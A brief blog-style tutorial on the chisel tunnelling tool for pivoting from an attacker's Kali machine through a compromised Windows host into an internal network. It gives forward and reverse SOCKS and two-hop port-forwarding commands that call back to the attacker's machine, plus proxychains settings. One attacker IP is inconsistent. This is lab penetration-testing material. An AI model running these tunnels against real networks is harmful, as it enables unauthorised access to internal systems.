banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

chisel Proxy Tool

chisel is a fast TCP/UDP tunnel based on HTTP.

Project address: https://github.com/jpillora/chisel/releases

Advantages: It uses SSH encryption, which provides good security. It has a disconnect and reconnect mechanism, which ensures good stability (similar to ew, it will disconnect if there is no activity for a long time). It is written in Go language and supports multiple platforms. It is a single file with no dependencies.

Attacker (kali): 192.168.6.131
Victim (windows): 192.168.6.129

Topology:

Attacker (192.168.6.131) < -- > Victim (192.168.6.129,10.1.1.1) < -- > Internal Server (10.1.1.2)

Target Access: 10.1.1.2

Level 1 Proxy#

Forward Connection (socks)

Jump Server (Victim)

./chisel server -p 12345

image

Attacker

./chisel client 192.168.6.129:12345 socks

image

The socks proxy is bound to port 1080. You just need to set up a socks5 proxy locally to access it.

Reverse Connection

Attacker (Hacker)

./chisel server -p 12345 --reverse --socks5

Jump Server (Victim)

chisel.exe client 192.168.6.128:12345 R:socks

image

The attacker (hacker) can access 10.1.1.2.

image

Level 2 Proxy#

image

Accessing Specific Ports#

Kali:

chisel server -p 3333 --reverse

web01:

Open two terminals, run both client and server

chisel server -p 2222 --reverse
chisel client 192.168.126.132:3333 R:1111:127.0.0.1:5555

web02:

chisel client 192.168.150.128:2222 R:5555:192.168.59.129:80

Access 192.168.59.129:80 by visiting 127.0.0.1:1111 on Kali.


Socks Proxy#

Kali:

chisel server -p 3333 --reverse

web01:

Open two terminals, run both client and server

chisel server -p 2222 --reverse --socks5
chisel client 192.168.126.132:3333 R:1111:socks

web02:

chisel client 192.168.150.128:2222 R:5555:socks

Configure proxy chain in proxychains.conf file

socks5 127.0.0.1 1111
socks5 127.0.0.1 5555

Reference: https://youtu.be/srUUUkcYEwg

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.